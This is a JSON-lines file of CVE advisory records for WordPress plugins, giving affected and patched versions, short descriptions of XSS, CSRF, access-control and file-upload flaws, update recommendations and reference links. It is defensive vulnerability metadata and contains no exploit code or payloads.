{"CVE_ID":"CVE-2024-3239","slug":"ultimate-post","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin  WordPress plugin before 4.0.2 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa1421b-41b0-4b25-95ef-0843103e1f5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa1421b-41b0-4b25-95ef-0843103e1f5e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7424","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to unauthorized modification of and access to data due to a missing capability check on several functions in all versions up to, and including, 4.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke those functions intended for admin use resulting in subscribers being able to upload csv files and view the contents of MPG projects.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860848c1-dd67-4baf-a571-bc866c5f12f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860848c1-dd67-4baf-a571-bc866c5f12f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/DatasetController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174918\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/models\\\/ProjectModel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3178830%40multiple-pages-generator-by-porthas%2Ftrunk&old=3174918%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3178830%40multiple-pages-generator-by-porthas%2Ftrunk&old=3174918%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"side-menu-lite","versionEndExcluding":"4.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"mwp-skype","versionEndExcluding":"4.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5571","slug":"embedpress","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's EmbedPress PDF widget in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7becdab6-f952-4649-8cea-4efadf841619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7becdab6-f952-4649-8cea-4efadf841619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/4.0.0\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L690\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/4.0.0\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L690\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097114\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097114\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5684","slug":"metform","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The MetForm \u2013 Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `mf-template` DOM Element in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/tags\\\/3.9.9\\\/public\\\/assets\\\/js\\\/app.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/tags\\\/3.9.9\\\/public\\\/assets\\\/js\\\/app.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dded505-8968-4ed2-8883-42a3ec50155c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dded505-8968-4ed2-8883-42a3ec50155c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13704","slug":"super-testimonial","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'st_user_title' parameter in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240039%40super-testimonial&new=3240039%40super-testimonial&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240039%40super-testimonial&new=3240039%40super-testimonial&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20720912-6bfd-4df1-97c7-7025c16d7a0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20720912-6bfd-4df1-97c7-7025c16d7a0f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0255","slug":"enable-media-replace","versionEndExcluding":"4.0.2","description":"The Enable Media Replace WordPress plugin before 4.0.2 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0239208-1e23-4774-9b8c-9611704a07a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0239208-1e23-4774-9b8c-9611704a07a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5505","slug":"backwpup","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The BackWPup plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.0.1 via the job-specific backup folder. This allows authenticated attackers to store backups in arbitrary folders on the server provided they can be written to by the server. Additionally, default settings will place an index.php and a .htaccess file into the chosen directory (unless already present) when the first backup job is run that are intended to prevent directory listing and file access. This means that an attacker could set the backup directory to the root of another site in a shared environment and thus disable that site.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98085a23-0cb6-442a-a28a-cb5c2890b60d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98085a23-0cb6-442a-a28a-cb5c2890b60d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-editjob.php?rev=2818974#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-editjob.php?rev=2818974#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980789%40backwpup%2Ftrunk&old=2954541%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980789%40backwpup%2Ftrunk&old=2954541%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000176\\\/backwpup\\\/trunk\\\/inc\\\/class-destination-folder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000176\\\/backwpup\\\/trunk\\\/inc\\\/class-destination-folder.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000176%40backwpup&new=3000176%40backwpup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000176%40backwpup&new=3000176%40backwpup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7423","slug":"stream","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Stream plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.0.1. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can lead to DoS or privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stream\\\/tags\\\/4.0.1\\\/classes\\\/class-network.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stream\\\/tags\\\/4.0.1\\\/classes\\\/class-network.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139815\\\/stream\\\/trunk\\\/classes\\\/class-network.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139815\\\/stream\\\/trunk\\\/classes\\\/class-network.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5504","slug":"backwpup","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The BackWPup plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.0.1 via the Log File Folder. This allows authenticated attackers to store backups in arbitrary folders on the server provided they can be written to by the server. Additionally, default settings will place an index.php and a .htaccess file into the chosen directory (unless already present) when the first backup job is run that are intended to prevent directory listing and file access. This means that an attacker could set the backup directory to the root of another site in a shared environment and thus disable that site.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e830fe1e-1171-46da-8ee7-0a6654153f18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e830fe1e-1171-46da-8ee7-0a6654153f18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-settings.php?rev=2818974#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-settings.php?rev=2818974#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000176%40backwpup%2Ftrunk&old=2980789%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000176%40backwpup%2Ftrunk&old=2980789%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1110","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.0.11","versionEndExcluding":"4.0.12","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings.","recommendation":"Update to version 4.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/7873ff520631087e2f10737860cdcd64d53187ba\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/7873ff520631087e2f10737860cdcd64d53187ba\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1109","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.0.11","versionEndExcluding":"4.0.12","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.","recommendation":"Update to version 4.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/0ac83d1955aa964a358833b1b5ce790fff45b3f4\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/0ac83d1955aa964a358833b1b5ce790fff45b3f4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5467","slug":"geo-my-wp","versionImpact":"4.0","versionEndExcluding":"4.0.1","description":"The GEO my WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0.1\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0.1\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L413\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a96ac71f-3dae-40eb-9268-d56688a5aa64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a96ac71f-3dae-40eb-9268-d56688a5aa64?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L401\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5539","slug":"wp-easy-contact","versionImpact":"4.0.0","versionEndExcluding":"4.0.1","description":"The Simple Contact Form Plugin for WordPress \u2013 WP Easy Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3296825%40wp-easy-contact&new=3296825%40wp-easy-contact&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3296825%40wp-easy-contact&new=3296825%40wp-easy-contact&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f584a439-3373-441c-a73e-5931ae63e7ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f584a439-3373-441c-a73e-5931ae63e7ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1764","slug":"loginpress","versionImpact":"3.3.1","versionEndExcluding":"4.0.0","description":"The LoginPress | wp-login Custom Login Page Customizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.1. This is due to missing or incorrect nonce validation on the 'custom_plugin_set_option' function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. The 'WPBRIGADE_SDK__DEV_MODE' constant must be set to 'true' to exploit the vulnerability.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/loginpress\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/loginpress\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253283\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pt.wordpress.org\\\/plugins\\\/loginpress\\\/\",\"name\":\"https:\\\/\\\/pt.wordpress.org\\\/plugins\\\/loginpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df6a2b4-2dc4-43dd-8282-5c05b0fa13f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df6a2b4-2dc4-43dd-8282-5c05b0fa13f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3288","slug":"logo-slider-wp","versionImpact":"3.9.9","versionEndExcluding":"4.0.0","description":"The Logo Slider  WordPress plugin before 4.0.0 does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef99f54-68df-4353-8fc0-9b09ac0df7ba\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef99f54-68df-4353-8fc0-9b09ac0df7ba\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5892","slug":"addons-for-divi","versionImpact":"3.6.6","versionEndExcluding":"4.0.0","description":"The Divi Torque Lite \u2013 Divi Theme and Extra Theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018support_unfiltered_files_upload\u2019 function in all versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78dae5be-a71b-45bc-8814-7cc86233ae90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78dae5be-a71b-45bc-8814-7cc86233ae90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/tags\\\/3.6.6\\\/includes\\\/extensions\\\/unfiltered-file-uploads\\\/ext-unfiltered-file-uploads.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/tags\\\/3.6.6\\\/includes\\\/extensions\\\/unfiltered-file-uploads\\\/ext-unfiltered-file-uploads.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088441%40addons-for-divi%2Ftags%2F4.0.0&old=3001416%40addons-for-divi%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088441%40addons-for-divi%2Ftags%2F4.0.0&old=3001416%40addons-for-divi%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11826","slug":"quillforms","versionImpact":"3.10.0","versionEndExcluding":"4.0.0","description":"The Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quillforms-popup' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214019\\\/quillforms\\\/trunk\\\/includes\\\/class-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214019\\\/quillforms\\\/trunk\\\/includes\\\/class-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59a4d69-cf51-44c1-90bf-19be04774c27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59a4d69-cf51-44c1-90bf-19be04774c27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4714","slug":"wp-dark-mode","versionEndExcluding":"4.0.0","description":"The WP Dark Mode WordPress plugin before 4.0.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61b475f1-bbfb-4450-a3b2-b8caf5df2340\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61b475f1-bbfb-4450-a3b2-b8caf5df2340\",\"refsource\":\"MISC\",\"tags\":[]}]"}
